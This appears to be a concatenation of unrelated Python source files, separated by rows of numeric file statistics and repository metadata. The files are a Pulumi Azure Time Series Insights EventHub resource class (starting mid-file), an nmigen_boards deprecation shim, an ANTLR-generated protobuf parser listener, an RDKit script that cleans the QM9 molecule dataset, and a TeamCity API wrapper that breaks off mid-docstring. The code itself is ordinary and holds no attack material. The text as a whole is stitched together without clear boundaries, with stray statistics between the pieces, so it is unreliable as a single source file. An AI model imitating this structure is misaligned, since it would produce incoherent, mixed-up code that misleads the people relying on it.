:param pulumi.Input[str] namespace_name: Specifies the EventHub Namespace name.
:param pulumi.Input[str] shared_access_key: Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
:param pulumi.Input[str] shared_access_key_name: Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] timestamp_property_name: Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: TimeSeriesInsightsEventSourceEventhubArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Azure IoT Time Series Insights EventHub Event Source.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_event_hub_namespace = azure.eventhub.EventHubNamespace("exampleEventHubNamespace",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="Standard")
example_event_hub = azure.eventhub.EventHub("exampleEventHub",
namespace_name=example_event_hub_namespace.name,
resource_group_name=example_resource_group.name,
partition_count=2,
message_retention=7)
example_consumer_group = azure.eventhub.ConsumerGroup("exampleConsumerGroup",
namespace_name=example_event_hub_namespace.name,
eventhub_name=example_event_hub.name,
resource_group_name=example_resource_group.name)
example_authorization_rule = azure.eventhub.AuthorizationRule("exampleAuthorizationRule",
namespace_name=example_event_hub_namespace.name,
eventhub_name=example_event_hub.name,
resource_group_name=example_resource_group.name,
listen=True,
send=False,
manage=False)
example_account = azure.storage.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
account_tier="Standard",
account_replication_type="LRS")
example_time_series_insights_gen2_environment = azure.iot.TimeSeriesInsightsGen2Environment("exampleTimeSeriesInsightsGen2Environment",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="L1",
id_properties=["id"],
storage=azure.iot.TimeSeriesInsightsGen2EnvironmentStorageArgs(
name=example_account.name,
key=example_account.primary_access_key,
))
example_time_series_insights_event_source_eventhub = azure.iot.TimeSeriesInsightsEventSourceEventhub("exampleTimeSeriesInsightsEventSourceEventhub",
location=example_resource_group.location,
environment_id=example_time_series_insights_gen2_environment.id,
eventhub_name=example_event_hub.name,
namespace_name=example_event_hub_namespace.name,
shared_access_key=example_authorization_rule.primary_key,
shared_access_key_name=example_authorization_rule.name,
consumer_group_name=example_consumer_group.name,
event_source_resource_id=example_event_hub.id)
```
## Import
Azure IoT Time Series Insights EventHub Event Source can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:iot/timeSeriesInsightsEventSourceEventhub:TimeSeriesInsightsEventSourceEventhub example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/example/providers/Microsoft.TimeSeriesInsights/environments/environment1/eventSources/example
```
:param str resource_name: The name of the resource.
:param TimeSeriesInsightsEventSourceEventhubArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TimeSeriesInsightsEventSourceEventhubArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
consumer_group_name: Optional[pulumi.Input[str]] = None,
environment_id: Optional[pulumi.Input[str]] = None,
event_source_resource_id: Optional[pulumi.Input[str]] = None,
eventhub_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_name: Optional[pulumi.Input[str]] = None,
shared_access_key: Optional[pulumi.Input[str]] = None,
shared_access_key_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timestamp_property_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = TimeSeriesInsightsEventSourceEventhubArgs.__new__(TimeSeriesInsightsEventSourceEventhubArgs)
if consumer_group_name is None and not opts.urn:
raise TypeError("Missing required property 'consumer_group_name'")
__props__.__dict__["consumer_group_name"] = consumer_group_name
if environment_id is None and not opts.urn:
raise TypeError("Missing required property 'environment_id'")
__props__.__dict__["environment_id"] = environment_id
if event_source_resource_id is None and not opts.urn:
raise TypeError("Missing required property 'event_source_resource_id'")
__props__.__dict__["event_source_resource_id"] = event_source_resource_id
if eventhub_name is None and not opts.urn:
raise TypeError("Missing required property 'eventhub_name'")
__props__.__dict__["eventhub_name"] = eventhub_name
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if namespace_name is None and not opts.urn:
raise TypeError("Missing required property 'namespace_name'")
__props__.__dict__["namespace_name"] = namespace_name
if shared_access_key is None and not opts.urn:
raise TypeError("Missing required property 'shared_access_key'")
__props__.__dict__["shared_access_key"] = shared_access_key
if shared_access_key_name is None and not opts.urn:
raise TypeError("Missing required property 'shared_access_key_name'")
__props__.__dict__["shared_access_key_name"] = shared_access_key_name
__props__.__dict__["tags"] = tags
__props__.__dict__["timestamp_property_name"] = timestamp_property_name
super(TimeSeriesInsightsEventSourceEventhub, __self__).__init__(
'azure:iot/timeSeriesInsightsEventSourceEventhub:TimeSeriesInsightsEventSourceEventhub',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
consumer_group_name: Optional[pulumi.Input[str]] = None,
environment_id: Optional[pulumi.Input[str]] = None,
event_source_resource_id: Optional[pulumi.Input[str]] = None,
eventhub_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_name: Optional[pulumi.Input[str]] = None,
shared_access_key: Optional[pulumi.Input[str]] = None,
shared_access_key_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timestamp_property_name: Optional[pulumi.Input[str]] = None) -> 'TimeSeriesInsightsEventSourceEventhub':
"""
Get an existing TimeSeriesInsightsEventSourceEventhub resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] consumer_group_name: Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
:param pulumi.Input[str] environment_id: Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to created.
:param pulumi.Input[str] event_source_resource_id: Specifies the resource id where events will be coming from.
:param pulumi.Input[str] eventhub_name: Specifies the name of the EventHub which will be associated with this resource.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
:param pulumi.Input[str] namespace_name: Specifies the EventHub Namespace name.
:param pulumi.Input[str] shared_access_key: Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
:param pulumi.Input[str] shared_access_key_name: Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] timestamp_property_name: Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _TimeSeriesInsightsEventSourceEventhubState.__new__(_TimeSeriesInsightsEventSourceEventhubState)
__props__.__dict__["consumer_group_name"] = consumer_group_name
__props__.__dict__["environment_id"] = environment_id
__props__.__dict__["event_source_resource_id"] = event_source_resource_id
__props__.__dict__["eventhub_name"] = eventhub_name
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["namespace_name"] = namespace_name
__props__.__dict__["shared_access_key"] = shared_access_key
__props__.__dict__["shared_access_key_name"] = shared_access_key_name
__props__.__dict__["tags"] = tags
__props__.__dict__["timestamp_property_name"] = timestamp_property_name
return TimeSeriesInsightsEventSourceEventhub(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="consumerGroupName")
def consumer_group_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
"""
return pulumi.get(self, "consumer_group_name")
@property
@pulumi.getter(name="environmentId")
def environment_id(self) -> pulumi.Output[str]:
"""
Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to created.
"""
return pulumi.get(self, "environment_id")
@property
@pulumi.getter(name="eventSourceResourceId")
def event_source_resource_id(self) -> pulumi.Output[str]:
"""
Specifies the resource id where events will be coming from.
"""
return pulumi.get(self, "event_source_resource_id")
@property
@pulumi.getter(name="eventhubName")
def eventhub_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the EventHub which will be associated with this resource.
"""
return pulumi.get(self, "eventhub_name")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="namespaceName")
def namespace_name(self) -> pulumi.Output[str]:
"""
Specifies the EventHub Namespace name.
"""
return pulumi.get(self, "namespace_name")
@property
@pulumi.getter(name="sharedAccessKey")
def shared_access_key(self) -> pulumi.Output[str]:
"""
Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
"""
return pulumi.get(self, "shared_access_key")
@property
@pulumi.getter(name="sharedAccessKeyName")
def shared_access_key_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
"""
return pulumi.get(self, "shared_access_key_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="timestampPropertyName")
def timestamp_property_name(self) -> pulumi.Output[str]:
"""
Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
"""
return pulumi.get(self, "timestamp_property_name")
| 51.832215
| 279
| 0.690017
| 4,602
| 38,615
| 5.546284
| 0.051282
| 0.068955
| 0.079533
| 0.059473
| 0.916392
| 0.905971
| 0.896019
| 0.878311
| 0.871141
| 0.8626
| 0
| 0.002778
| 0.226259
| 38,615
| 744
| 280
| 51.901882
| 0.851496
| 0.424757
| 0
| 0.720627
| 1
| 0
| 0.126054
| 0.050781
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16188
| false
| 0.002611
| 0.013055
| 0
| 0.27154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f327e1178ad3751f0d7c9636420c8cac8f41a20d
| 278
|
py
|
Python
|
nmigen_boards/qmtech_daughterboard.py
|
hansfbaier/amaranth-boards
|
a3e92db69e74cc18a42808f6f72068f05efe018e
|
[
"BSD-2-Clause"
] | 1
|
2022-01-22T20:23:07.000Z
|
2022-01-22T20:23:07.000Z
|
nmigen_boards/qmtech_daughterboard.py
|
amaranth-community-unofficial/amaranth-boards
|
eacb18700d0ed97f525737ca80d923ebd5851505
|
[
"BSD-2-Clause"
] | null | null | null |
nmigen_boards/qmtech_daughterboard.py
|
amaranth-community-unofficial/amaranth-boards
|
eacb18700d0ed97f525737ca80d923ebd5851505
|
[
"BSD-2-Clause"
] | null | null | null |
from amaranth_boards.qmtech_daughterboard import *
from amaranth_boards.qmtech_daughterboard import __all__
import warnings
warnings.warn("instead of nmigen_boards.qmtech_daughterboard, use amaranth_boards.qmtech_daughterboard",
DeprecationWarning, stacklevel=2)
| 39.714286
| 104
| 0.834532
| 31
| 278
| 7.096774
| 0.516129
| 0.218182
| 0.454545
| 0.45
| 0.390909
| 0.390909
| 0
| 0
| 0
| 0
| 0
| 0.004065
| 0.115108
| 278
| 7
| 105
| 39.714286
| 0.890244
| 0
| 0
| 0
| 0
| 0
| 0.311828
| 0.25448
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b8a3d281f09a3078b19ad1dadbdf5feb56bf81cd
| 8,201
|
py
|
Python
|
bin/protobuf/ProtoParserListener.py
|
vak/protobuf2uml
|
537db478e34fc34e39dec1fd0a47b27730a6f9b4
|
[
"Apache-2.0"
] | 28
|
2015-01-08T12:12:16.000Z
|
2021-02-26T20:01:56.000Z
|
bin/protobuf/ProtoParserListener.py
|
vak/protobuf2uml
|
537db478e34fc34e39dec1fd0a47b27730a6f9b4
|
[
"Apache-2.0"
] | 5
|
2015-01-31T00:26:38.000Z
|
2020-10-05T14:55:05.000Z
|
bin/protobuf/ProtoParserListener.py
|
vak/protobuf2uml
|
537db478e34fc34e39dec1fd0a47b27730a6f9b4
|
[
"Apache-2.0"
] | 16
|
2015-03-13T14:47:17.000Z
|
2021-07-18T16:20:14.000Z
|
# Generated from java-escape by ANTLR 4.4
from antlr4 import *
# This class defines a complete listener for a parse tree produced by ProtoParser.
class ProtoParserListener(ParseTreeListener):
# Enter a parse tree produced by ProtoParser#all_identifier.
def enterAll_identifier(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#all_identifier.
def exitAll_identifier(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#rpc_name.
def enterRpc_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#rpc_name.
def exitRpc_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#ext_name.
def enterExt_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#ext_name.
def exitExt_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_value_item.
def enterOption_value_item(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_value_item.
def exitOption_value_item(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#service_name.
def enterService_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#service_name.
def exitService_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#all_value.
def enterAll_value(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#all_value.
def exitAll_value(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#message_content.
def enterMessage_content(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#message_content.
def exitMessage_content(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#service_content.
def enterService_content(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#service_content.
def exitService_content(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#import_file_name.
def enterImport_file_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#import_file_name.
def exitImport_file_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#enum_name.
def enterEnum_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#enum_name.
def exitEnum_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#message_def.
def enterMessage_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#message_def.
def exitMessage_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#resp_name.
def enterResp_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#resp_name.
def exitResp_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#import_def.
def enterImport_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#import_def.
def exitImport_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#service_def.
def enterService_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#service_def.
def exitService_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_value_object.
def enterOption_value_object(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_value_object.
def exitOption_value_object(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#enum_item_def.
def enterEnum_item_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#enum_item_def.
def exitEnum_item_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#enum_def.
def enterEnum_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#enum_def.
def exitEnum_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_name.
def enterOption_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_name.
def exitOption_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#req_name.
def enterReq_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#req_name.
def exitReq_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#package_name.
def enterPackage_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#package_name.
def exitPackage_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#rpc_def.
def enterRpc_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#rpc_def.
def exitRpc_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#ext_def.
def enterExt_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#ext_def.
def exitExt_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#ext_content.
def enterExt_content(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#ext_content.
def exitExt_content(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_line_def.
def enterOption_line_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_line_def.
def exitOption_line_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#proto.
def enterProto(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#proto.
def exitProto(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#message_ext_def.
def enterMessage_ext_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#message_ext_def.
def exitMessage_ext_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#package_def.
def enterPackage_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#package_def.
def exitPackage_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_field_item.
def enterOption_field_item(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_field_item.
def exitOption_field_item(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#proto_type.
def enterProto_type(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#proto_type.
def exitProto_type(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#literal_value.
def enterLiteral_value(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#literal_value.
def exitLiteral_value(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_all_value.
def enterOption_all_value(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_all_value.
def exitOption_all_value(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_field_def.
def enterOption_field_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_field_def.
def exitOption_field_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#message_name.
def enterMessage_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#message_name.
def exitMessage_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#message_item_def.
def enterMessage_item_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#message_item_def.
def exitMessage_item_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#enum_content.
def enterEnum_content(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#enum_content.
def exitEnum_content(self, ctx):
pass
| 25.468944
| 82
| 0.683819
| 1,113
| 8,201
| 4.880503
| 0.068284
| 0.078424
| 0.130707
| 0.235272
| 0.842415
| 0.827688
| 0.821981
| 0.821981
| 0.819956
| 0.741348
| 0
| 0.000491
| 0.255335
| 8,201
| 321
| 83
| 25.548287
| 0.88898
| 0.487867
| 0
| 0.492958
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.492958
| false
| 0.492958
| 0.035211
| 0
| 0.535211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 11
|
b2640457a643106db8db8ea46c7c4e7929ae44ad
| 4,207
|
py
|
Python
|
preprocessing/clean_qm9.py
|
olsson-group/transBG
|
046adb33ef50fb54981e344cbb09411f7e53d80a
|
[
"MIT"
] | null | null | null |
preprocessing/clean_qm9.py
|
olsson-group/transBG
|
046adb33ef50fb54981e344cbb09411f7e53d80a
|
[
"MIT"
] | null | null | null |
preprocessing/clean_qm9.py
|
olsson-group/transBG
|
046adb33ef50fb54981e344cbb09411f7e53d80a
|
[
"MIT"
] | null | null | null |
from rdkit.Chem import PandasTools
import pandas as pd
import os
from rdkit import Chem
import numpy as np
cwd = os.getcwd()
dataset_path = os.path.join(cwd, "datasets/QM9/qm9/gdb9.sdf")
i_mol = 0
atom_types = []
edge_types = []
formal_charges_types = []
max_atoms = 0
max_edges = 0
total_mol = 0
unused_mol = []
for mol in Chem.SDMolSupplier(dataset_path, removeHs = False, sanitize = True):
total_mol += 1
if mol != None:
# Check if the biggest molecule fragment has more tham 1 atom
mol = Chem.rdmolops.GetMolFrags(mol, asMols = True) #Choose biggest fragment if several
aux_f = lambda i: mol[i].GetNumAtoms()
sub_mol_idx = max( range(len(mol)), key = aux_f )
mol = mol[sub_mol_idx]
if mol.GetNumAtoms() < 2:
unused_mol.append(total_mol - 1)
continue
#Get the atoms of the molecule
atoms = []
formal_charges = []
edges = []
for atom in mol.GetAtoms():
atoms.append(atom.GetAtomicNum())
formal_charges.append( atom.GetFormalCharge() )
for edge in mol.GetBonds():
edges.append(edge.GetBondTypeAsDouble())
new_atom_types = list(np.setdiff1d(atoms, atom_types))
if new_atom_types != []:
atom_types.extend(new_atom_types)
new_formal_charges = list(np.setdiff1d(formal_charges, formal_charges_types))
if new_formal_charges != []:
formal_charges_types.extend(new_formal_charges)
new_edge_types = list(np.setdiff1d(edges, edge_types))
if new_edge_types != []:
edge_types.extend(new_edge_types)
if max_atoms < mol.GetNumAtoms():
max_atoms = mol.GetNumAtoms()
else:
unused_mol.append(total_mol - 1)
print(atom_types, flush = True)
print(formal_charges_types, flush = True)
print(max_atoms, flush = True)
print(edge_types, flush = True)
print(len(unused_mol), flush = True)
print(total_mol, flush = True)
clean_sdf = os.path.join(cwd, "datasets/QM9/qm9/clean_gdb9.sdf")
#Cleaning
frame = PandasTools.LoadSDF(dataset_path, removeHs = False)
#frame.drop(frame.index[unused_mol], inplace = True)
indexes_to_keep = set(range(frame.shape[0])) - set(unused_mol)
clean_frame = frame.take( list(indexes_to_keep) )
PandasTools.WriteSDF(clean_frame, clean_sdf)
#Check that the procedure worked
i_mol = 0
atom_types = []
edge_types = []
formal_charges_types = []
max_atoms = 0
max_edges = 0
total_mol = 0
unused_mol = []
for mol in Chem.SDMolSupplier(clean_sdf, removeHs = False, sanitize = True):
total_mol += 1
if mol != None:
# Check if the biggest molecule fragment has more tham 1 atom
mol = Chem.rdmolops.GetMolFrags(mol, asMols = True) #Choose biggest fragment if several
aux_f = lambda i: mol[i].GetNumAtoms()
sub_mol_idx = max( range(len(mol)), key = aux_f )
mol = mol[sub_mol_idx]
if mol.GetNumAtoms() < 2:
unused_mol.append(total_mol - 1)
continue
#Get the atoms of the molecule
atoms = []
formal_charges = []
edges = []
for atom in mol.GetAtoms():
atoms.append(atom.GetAtomicNum())
formal_charges.append( atom.GetFormalCharge() )
for edge in mol.GetBonds():
edges.append(edge.GetBondTypeAsDouble())
new_atom_types = list(np.setdiff1d(atoms, atom_types))
if new_atom_types != []:
atom_types.extend(new_atom_types)
new_formal_charges = list(np.setdiff1d(formal_charges, formal_charges_types))
if new_formal_charges != []:
formal_charges_types.extend(new_formal_charges)
new_edge_types = list(np.setdiff1d(edges, edge_types))
if new_edge_types != []:
edge_types.extend(new_edge_types)
if max_atoms < mol.GetNumAtoms():
max_atoms = mol.GetNumAtoms()
else:
unused_mol.append(total_mol - 1)
print(atom_types, flush = True)
print(formal_charges_types, flush = True)
print(max_atoms, flush = True)
print(edge_types, flush = True)
print(len(unused_mol), flush = True)
print(total_mol, flush = True)
print()
| 28.234899
| 95
| 0.649869
| 562
| 4,207
| 4.631673
| 0.176157
| 0.099885
| 0.059163
| 0.043796
| 0.846715
| 0.846715
| 0.846715
| 0.82597
| 0.82597
| 0.82597
| 0
| 0.009758
| 0.24483
| 4,207
| 149
| 96
| 28.234899
| 0.809569
| 0.079629
| 0
| 0.854369
| 0
| 0
| 0.014497
| 0.014497
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.048544
| 0
| 0.048544
| 0.126214
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b26ff313e2782db44fb08e8f44a0c4c2543c5bf9
| 27,924
|
py
|
Python
|
dohq_teamcity/custom/api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 23
|
2018-10-19T07:28:45.000Z
|
2021-11-12T12:46:09.000Z
|
dohq_teamcity/custom/api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 31
|
2018-10-16T05:53:11.000Z
|
2021-09-09T14:44:14.000Z
|
dohq_teamcity/custom/api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 12
|
2018-10-28T23:00:17.000Z
|
2021-09-07T12:07:13.000Z
|
from dohq_teamcity.api import * # noqa
class AgentApi(AgentApi):
def get(self, agent_locator, **kwargs):
"""
:param async_req: bool
:param str agent_locator: (required)
:param str fields:
:return: Agent
"""
return self.serve_agent(agent_locator, **kwargs)
def get_agent(self, agent_locator, **kwargs):
"""
:param async_req: bool
:param str agent_locator: (required)
:param str fields:
:return: Agent
"""
return self.serve_agent(agent_locator, **kwargs)
def get_agent_field(self, agent_locator, field, **kwargs):
"""
:param async_req: bool
:param str agent_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_agent_field(agent_locator, field, **kwargs)
def get_agents(self, **kwargs):
"""
:param async_req: bool
:param bool include_disconnected:
:param bool include_unauthorized:
:param str locator:
:param str fields:
:return: Agents
"""
return self.serve_agents(**kwargs)
class AgentPoolApi(AgentPoolApi):
def get(self, agent_pool_locator, **kwargs):
"""
:param async_req: bool
:param str agent_pool_locator: (required)
:param str fields:
:return: AgentPool
"""
return self.get_pool(agent_pool_locator, **kwargs)
class BuildApi(BuildApi):
def get(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: Build
"""
return self.serve_build(build_locator, **kwargs)
def get_aggregated_build_status(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:return: str
"""
return self.serve_aggregated_build_status(build_locator, **kwargs)
def get_aggregated_build_status_icon(self, build_locator, suffix, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str suffix: (required)
:return: None
"""
return self.serve_aggregated_build_status_icon(
build_locator, suffix, **kwargs)
def get_all_builds(self, **kwargs):
"""
:param async_req: bool
:param str build_type:
:param str status:
:param str triggered_by_user:
:param bool include_personal:
:param bool include_canceled:
:param bool only_pinned:
:param list[str] tag:
:param str agent_name:
:param str since_build:
:param str since_date:
:param int start:
:param int count:
:param str locator:
:param str fields:
:return: Builds
"""
return self.serve_all_builds(**kwargs)
def get_build(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: Build
"""
return self.serve_build(build_locator, **kwargs)
def get_build_actual_parameters(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_build_actual_parameters(build_locator, **kwargs)
def get_build_field_by_build_only(self, build_locator, field, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_field_by_build_only(
build_locator, field, **kwargs)
def get_build_related_issues(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: IssuesUsages
"""
return self.serve_build_related_issues(build_locator, **kwargs)
def get_build_related_issues_old(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: IssuesUsages
"""
return self.serve_build_related_issues_old(build_locator, **kwargs)
def get_build_statistic_value(self, build_locator, name, **kwargs):
"""
